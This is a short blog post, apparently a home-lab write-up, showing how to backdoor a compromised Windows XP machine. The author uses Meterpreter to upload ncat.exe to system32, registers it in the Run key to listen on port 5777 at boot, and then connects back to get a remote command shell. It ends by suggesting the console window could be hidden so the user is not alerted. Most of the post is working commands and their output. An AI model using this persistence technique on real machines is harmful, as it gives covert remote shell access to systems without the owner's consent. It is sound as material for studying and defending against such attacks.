I couldn’t figure out how to do this in Armitage and so had to resort to the good ol’ Terminal.
I exploited the XP system as per this post and obtained an Meterpreter shell.
First to upload the Ncat.exe file to the target machine:
meterpreter > upload ncat.exe c:windowssystem32
[*] uploading : ncat.exe -> c:windowssystem32
[*] uploaded : ncat.exe -> c:windowssystem32ncat.exe
meterpreter >
Next we need to get Ncat to execute on startup so we manipulate the Windows Registry:
Sorry the above is an image, pasting in the code messed up WordPress.
Note the -l (listen) 5777 (port number) arguments are set at this point.
We can double check our program is in the registry:
meterpreter > reg enumkey -k HKLMsoftwaremicrosoftwindowscurrentversionrun
Enumerating: HKLMsoftwaremicrosoftwindowscurrentversionrunValues (5):
VMware hqtray
TgZcTlqTJNmSbP
TIOzUGrTHgMzS
zmvSLZpTksgWih
ncatmeterpreter >
As we can see Ncat is included
Now to reboot the target XP machine and see if we can establish a connection:
# ncat 192.168.1.79 5777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.C:Documents and SettingsLab1>
Voilà
Two issues to note.
Firstly a dirty great big command box is opened on startup which if the user closes, terminates our connection.
Secondly, I haven’t dealt with any tricky firewall issues that may prevent the inbound connection.
However, as a proof of concept, it works perfectly and I’m sure there are ways to prevent the command box opening so that the Ncat program runs without alerting the user.